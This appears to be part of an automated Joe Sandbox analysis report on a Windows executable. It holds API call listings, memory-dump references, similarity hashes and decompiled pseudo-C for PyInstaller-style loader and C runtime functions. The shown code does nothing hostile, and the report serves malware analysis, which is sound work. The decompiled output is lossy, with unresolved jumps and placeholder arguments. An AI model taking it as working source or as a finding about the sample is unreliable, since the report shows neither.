                                                                                                                                                                                                                              0x7ff735c4c275
                                                                                                                                                                                                                              0x7ff735c4c27b
                                                                                                                                                                                                                              0x7ff735c4c281
                                                                                                                                                                                                                              0x7ff735c4c28c
                                                                                                                                                                                                                              0x7ff735c4c28e
                                                                                                                                                                                                                              0x7ff735c4c28e
                                                                                                                                                                                                                              0x7ff735c4c2a3
                                                                                                                                                                                                                              0x7ff735c4c2a5
                                                                                                                                                                                                                              0x7ff735c4c2ad
                                                                                                                                                                                                                              0x7ff735c4c2b9
                                                                                                                                                                                                                              0x7ff735c4c2c5
                                                                                                                                                                                                                              0x7ff735c4c2d4
                                                                                                                                                                                                                              0x7ff735c4c2e3
                                                                                                                                                                                                                              0x7ff735c4c2e3
                                                                                                                                                                                                                              0x7ff735c4c2e3
                                                                                                                                                                                                                              0x7ff735c4c2ee
                                                                                                                                                                                                                              0x7ff735c4c2f3
                                                                                                                                                                                                                              0x7ff735c4c2ff
                                                                                                                                                                                                                              0x7ff735c4c308
                                                                                                                                                                                                                              0x7ff735c4c30d
                                                                                                                                                                                                                              0x7ff735c4c315
                                                                                                                                                                                                                              0x7ff735c4c317
                                                                                                                                                                                                                              0x7ff735c4c33d

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF735C4C4A2,?,?,?,00007FF735C4C19C,?,?,?,?,00007FF735C4BDCD), ref: 00007FF735C4C275
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF735C4C4A2,?,?,?,00007FF735C4C19C,?,?,?,?,00007FF735C4BDCD), ref: 00007FF735C4C283
                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF735C4C4A2,?,?,?,00007FF735C4C19C,?,?,?,?,00007FF735C4BDCD), ref: 00007FF735C4C2AD
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF735C4C4A2,?,?,?,00007FF735C4C19C,?,?,?,?,00007FF735C4BDCD), ref: 00007FF735C4C2F3
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF735C4C4A2,?,?,?,00007FF735C4C19C,?,?,?,?,00007FF735C4BDCD), ref: 00007FF735C4C2FF
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                                                                              • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                              • Opcode ID: 7da2fa64384c12c5a0f0ed45819c585c6b7b80aa90f69c5a85813fd0034ca1ba
                                                                                                                                                                                                                              • Instruction ID: 0c2669f36fe82dc8368f6234333f7ebaf8b18375e02b701fb71d61e3ccfd4574
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da2fa64384c12c5a0f0ed45819c585c6b7b80aa90f69c5a85813fd0034ca1ba
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED3198A3B1E653A1EE22BB46A4009B5E2A5FF49F68F990535DD1D07350EF3CE841D320
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C45F60 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                                                              			E00007FF77FF735C45F60(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __r8, char _a24, char _a8216, signed int _a16408, long long _a16448) {
				void* __rdi;
				long _t16;
				void* _t33;
				void* _t39;
				void* _t40;
				signed long long _t48;
				signed long long _t49;
				long long _t51;
				signed long long _t73;
				void* _t75;
				void* _t76;
				void* _t84;
				void* _t85;
				void* _t86;

				_t79 = __r8;
				_t51 = __rbx;
				_t33 = __edx;
				E00007FF77FF735C4A3B0(0x4030, __rax, _t85, _t86);
				_t77 = _t76 - __rax;
				_t48 =  *0x35c7b008; // 0x861d85c91f07
				_t49 = _t48 ^ _t76 - __rax;
				_a16408 = _t49;
				_t68 = __rcx;
				r8d = 0;
				E00007FF77FF735C47250(_t49, __rbx, __rcx, __rcx, _t75, __r8);
				if (_t49 != 0) goto 0x35c45fa9;
				E00007FF77FF735C42820(_t49, "LOADER: Failed to convert runtime-tmpdir to a wide string.\n", _t68, _t79, _t84);
				goto 0x35c46092;
				r8d = 0x1000;
				_a16448 = _t51;
				_t16 = ExpandEnvironmentStringsW(??, ??, ??);
				E00007FF77FF735C5377C(0, _t49,  &_a8216, _t79);
				if (_t16 != 0) goto 0x35c45fe9;
				E00007FF77FF735C42820(_t49, "LOADER: Failed to expand environment variables in the runtime-tmpdir.\n",  &_a8216, _t79, _t84);
				goto 0x35c4608a;
				r8d = 0x1000;
				E00007FF77FF735C54A28(0, _t33, _t49, _t51, "LOADER: Failed to expand environment variables in the runtime-tmpdir.\n",  &_a8216, _t49, _t75, _t79);
				if (_t49 != 0) goto 0x35c46016;
				E00007FF77FF735C42820(_t49, "LOADER: Failed to obtain the absolute path of the runtime-tmpdir.\n",  &_a8216, _t79, _t84);
				goto 0x35c4608a;
				r8d = 0x2000;
				E00007FF77FF735C4B800(0, 0,  &_a24,  &_a8216, _t79);
				E00007FF77FF735C4BB3C(0x5c, _t49, _t84);
				_t73 = _t49;
				if (_t49 == 0) goto 0x35c4607c;
				E00007FF77FF735C55604(0, _t39, _t40,  &_a24, _t49, _t73, (_t73 - _t49 >> 1) + 1);
				CreateDirectoryW(??, ??);
				_t8 = _t73 + 2; // 0x2
				E00007FF77FF735C4BB3C(0x5c, _t8, _t84);
				if (_t49 != 0) goto 0x35c46040;
				return E00007FF77FF735C4A410(CreateDirectoryW(??, ??), 0, _a16408 ^ _t77);
			}

















                                                                                                                                                                                                                              0x7ff735c45f60
                                                                                                                                                                                                                              0x7ff735c45f60
                                                                                                                                                                                                                              0x7ff735c45f60
                                                                                                                                                                                                                              0x7ff735c45f67
                                                                                                                                                                                                                              0x7ff735c45f6c
                                                                                                                                                                                                                              0x7ff735c45f6f
                                                                                                                                                                                                                              0x7ff735c45f76
                                                                                                                                                                                                                              0x7ff735c45f79
                                                                                                                                                                                                                              0x7ff735c45f81
                                                                                                                                                                                                                              0x7ff735c45f84
                                                                                                                                                                                                                              0x7ff735c45f89
                                                                                                                                                                                                                              0x7ff735c45f94
                                                                                                                                                                                                                              0x7ff735c45f9d
                                                                                                                                                                                                                              0x7ff735c45fa4
                                                                                                                                                                                                                              0x7ff735c45fa9
                                                                                                                                                                                                                              0x7ff735c45faf
                                                                                                                                                                                                                              0x7ff735c45fc2
                                                                                                                                                                                                                              0x7ff735c45fcd
                                                                                                                                                                                                                              0x7ff735c45fd4
                                                                                                                                                                                                                              0x7ff735c45fdd
                                                                                                                                                                                                                              0x7ff735c45fe4
                                                                                                                                                                                                                              0x7ff735c45fe9
                                                                                                                                                                                                                              0x7ff735c45ff9
                                                                                                                                                                                                                              0x7ff735c46004
                                                                                                                                                                                                                              0x7ff735c4600d
                                                                                                                                                                                                                              0x7ff735c46014
                                                                                                                                                                                                                              0x7ff735c4601d
                                                                                                                                                                                                                              0x7ff735c46023
                                                                                                                                                                                                                              0x7ff735c46030
                                                                                                                                                                                                                              0x7ff735c46035
                                                                                                                                                                                                                              0x7ff735c4603b
                                                                                                                                                                                                                              0x7ff735c46054
                                                                                                                                                                                                                              0x7ff735c46060
                                                                                                                                                                                                                              0x7ff735c4606b
                                                                                                                                                                                                                              0x7ff735c4606f
                                                                                                                                                                                                                              0x7ff735c4607a
                                                                                                                                                                                                                              0x7ff735c460aa

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C47250: MultiByteToWideChar.KERNEL32 ref: 00007FF735C4728A
                                                                                                                                                                                                                              • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF735C4627F,00000000,00000000,?,TokenIntegrityLevel), ref: 00007FF735C45FC2
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C42820: MessageBoxW.USER32 ref: 00007FF735C428F1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF735C45F96
                                                                                                                                                                                                                              • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF735C45FD6
                                                                                                                                                                                                                              • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF735C46006
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                              • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                                              • API String ID: 1662231829-3498232454
                                                                                                                                                                                                                              • Opcode ID: dae840cac137f18c0017ef69d4056671f5380303c0a1181c539b7f7b03ebabea
                                                                                                                                                                                                                              • Instruction ID: 106c18cc0121a4b6359ff220586da75b7339f1985dd0a5f8ac8e9242da11fc33
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dae840cac137f18c0017ef69d4056671f5380303c0a1181c539b7f7b03ebabea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A31CB93B1C75361FA22B721D9156B9E252AF98FCCFC44431DA0E4378AED2CE104D624
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C47250 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32 ref: 00007FF735C4728A
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF735C47063,?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C42704
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: MessageBoxW.USER32 ref: 00007FF735C427DC
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32 ref: 00007FF735C47310
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                                              • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                                              • API String ID: 3723044601-876015163
                                                                                                                                                                                                                              • Opcode ID: 9c278a3ae4efb9df9899c8febeeb5e800ee08c26b8f9385ce6974cdf16bf9cfb
                                                                                                                                                                                                                              • Instruction ID: cea3e8c6db0f296308cba4626ddc04b8a2e7bafe3335a861e6c0308233437f4e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c278a3ae4efb9df9899c8febeeb5e800ee08c26b8f9385ce6974cdf16bf9cfb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A021B663B08A53A2EB10EB19F401065E3A1FF84BCCFD84631DB4C43B69EE2CD6419710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59C60 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59C6F
                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59C84
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59CA5
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59CD2
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59CE3
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59CF4
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF735C6198B,?,?,?,00007FF735C5C200,?,?,00000000,00007FF735C5313F,?,?,?,00007FF735C58974), ref: 00007FF735C59D0F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: c21b94ba5b57f5214daaaf5109b8a2eff825f3f4caa145076c85e842d1cd6718
                                                                                                                                                                                                                              • Instruction ID: 027a7399239aaa137a64dd83a95a603a091a5dab2a6b97233a735c0c100e1224
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c21b94ba5b57f5214daaaf5109b8a2eff825f3f4caa145076c85e842d1cd6718
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5217FA2A0C24362FA1473B35655139D2A29F44FFCFD40B74D82E47BCADE2CB400E260
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C66280 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                              • String ID: CONOUT$
                                                                                                                                                                                                                              • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                              • Opcode ID: df2871fb8b7faffb3739c1208eb56f3e9bde2d53779614f62ad835bd0c66e071
                                                                                                                                                                                                                              • Instruction ID: 1723bd1bf3e387ce882e4bf9c6b15f19d2027c5ca3695c8d7747c8e151dee11c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df2871fb8b7faffb3739c1208eb56f3e9bde2d53779614f62ad835bd0c66e071
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85118E32A18A4396E350AB12E854369E7B0FB88FE8F984334EE1D87B94DF7CD5449750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C59DD8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF735C53B21,?,?,?,?,00007FF735C5D437,?,?,00000000,00007FF735C59EF6,?,?,?), ref: 00007FF735C59DE7
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C53B21,?,?,?,?,00007FF735C5D437,?,?,00000000,00007FF735C59EF6,?,?,?), ref: 00007FF735C59E1D
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C53B21,?,?,?,?,00007FF735C5D437,?,?,00000000,00007FF735C59EF6,?,?,?), ref: 00007FF735C59E4A
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C53B21,?,?,?,?,00007FF735C5D437,?,?,00000000,00007FF735C59EF6,?,?,?), ref: 00007FF735C59E5B
                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF735C53B21,?,?,?,?,00007FF735C5D437,?,?,00000000,00007FF735C59EF6,?,?,?), ref: 00007FF735C59E6C
                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF735C53B21,?,?,?,?,00007FF735C5D437,?,?,00000000,00007FF735C59EF6,?,?,?), ref: 00007FF735C59E87
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                              • Opcode ID: 8dab9077da3080d2f0fe89beb6f2928fbf4ea0b4c806516d0c38c694ed8417dd
                                                                                                                                                                                                                              • Instruction ID: 31a771e5e3e222760a7d8ce93103ac98e18ac26241f1028cf65febb3c5d59727
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dab9077da3080d2f0fe89beb6f2928fbf4ea0b4c806516d0c38c694ed8417dd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5118162A0824362FA1477B35655079E2A28F84FFCFD40B74D82E467CADE6CA841E221
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C4D748 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 62%
                                                                                                                                                                                                                              			E00007FF77FF735C4D748(void* __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
				signed int _v32;
				long long _v40;
				char _v48;
				signed int* _v56;
				void* _t55;
				intOrPtr _t60;
				signed int _t101;
				void* _t109;
				intOrPtr _t111;
				signed int* _t116;
				intOrPtr* _t136;
				void* _t139;
				void* _t142;
				void* _t144;
				void* _t158;
				void* _t159;

				_t109 = _t144;
				 *((long long*)(_t109 + 8)) = __rbx;
				 *((long long*)(_t109 + 0x10)) = __rbp;
				 *((long long*)(_t109 + 0x18)) = __rsi;
				 *((long long*)(_t109 + 0x20)) = __rdi;
				_t136 = __rcx;
				_t139 = __r9;
				_t159 = __r8;
				_t142 = __rdx;
				E00007FF77FF735C4BFE4(_t55, __r8);
				E00007FF77FF735C4C03C(_t109);
				_t116 = _a40;
				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x35c4d7ca;
				if ( *__rcx == 0xe06d7363) goto 0x35c4d7ca;
				if ( *__rcx != 0x80000029) goto 0x35c4d7ae;
				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x35c4d7b2;
				goto 0x35c4d7b0;
				if ( *__rcx == 0x80000026) goto 0x35c4d7ca;
				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x35c4d7ca;
				if ((_t116[9] & 0x00000001) != 0) goto 0x35c4d959;
				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x35c4d862;
				if (_t116[1] == 0) goto 0x35c4d959;
				if (_a48 != 0) goto 0x35c4d959;
				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x35c4d84f;
				if ( *__rcx != 0x80000026) goto 0x35c4d82d;
				_t60 = E00007FF77FF735C4CB2C(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
				if (_t60 - 0xffffffff < 0) goto 0x35c4d979;
				if (_t60 - _t116[1] >= 0) goto 0x35c4d979;
				r9d = _t60;
				E00007FF77FF735C4DCDC(_t109, _t142, __r9, _t116);
				goto 0x35c4d959;
				if ( *_t136 != 0x80000029) goto 0x35c4d84f;
				r9d =  *((intOrPtr*)(_t136 + 0x38));
				if (r9d - 0xffffffff < 0) goto 0x35c4d979;
				if (r9d - _t116[1] >= 0) goto 0x35c4d979;
				goto 0x35c4d81d;
				E00007FF77FF735C4C5A4(r9d - _t116[1], _t109, _t116, __r9, __r9, _t116);
				goto 0x35c4d959;
				if (_t116[3] != 0) goto 0x35c4d8aa;
				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0x35c4d88a;
				_t101 = _t116[8];
				if (_t101 == 0) goto 0x35c4d88a;
				E00007FF77FF735C4C9A8(_t109);
				if (_t101 != 0) goto 0x35c4d8aa;
				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x35c4d959;
				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0x35c4d959;
				if ( *_t136 != 0xe06d7363) goto 0x35c4d920;
				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x35c4d920;
				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x35c4d920;
				_t111 =  *((intOrPtr*)(_t136 + 0x30));
				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x35c4d920;
				E00007FF77FF735C4C9BC(_t111);
				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x35c4d920;
				_v32 = _a64 & 0x000000ff;
				_v40 = _a56;
				_v48 = _a48;
				_v56 = _t116;
				 *0x35c69428(_t158);
				goto 0x35c4d95e;
				_v32 = _a56;
				_v40 = _a48;
				_v48 = _a64;
				_v56 = _t116;
				E00007FF77FF735C4CF28(_a48, 0x80000026, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
				return 1;
			}



















                                                                                                                                                                                                                              0x7ff735c4d748
                                                                                                                                                                                                                              0x7ff735c4d74b
                                                                                                                                                                                                                              0x7ff735c4d74f
                                                                                                                                                                                                                              0x7ff735c4d753
                                                                                                                                                                                                                              0x7ff735c4d757
                                                                                                                                                                                                                              0x7ff735c4d761
                                                                                                                                                                                                                              0x7ff735c4d764
                                                                                                                                                                                                                              0x7ff735c4d76a
                                                                                                                                                                                                                              0x7ff735c4d76d
                                                                                                                                                                                                                              0x7ff735c4d770
                                                                                                                                                                                                                              0x7ff735c4d775
                                                                                                                                                                                                                              0x7ff735c4d77a
                                                                                                                                                                                                                              0x7ff735c4d790
                                                                                                                                                                                                                              0x7ff735c4d798
                                                                                                                                                                                                                              0x7ff735c4d79c
                                                                                                                                                                                                                              0x7ff735c4d7a2
                                                                                                                                                                                                                              0x7ff735c4d7ac
                                                                                                                                                                                                                              0x7ff735c4d7b0
                                                                                                                                                                                                                              0x7ff735c4d7be
                                                                                                                                                                                                                              0x7ff735c4d7c4
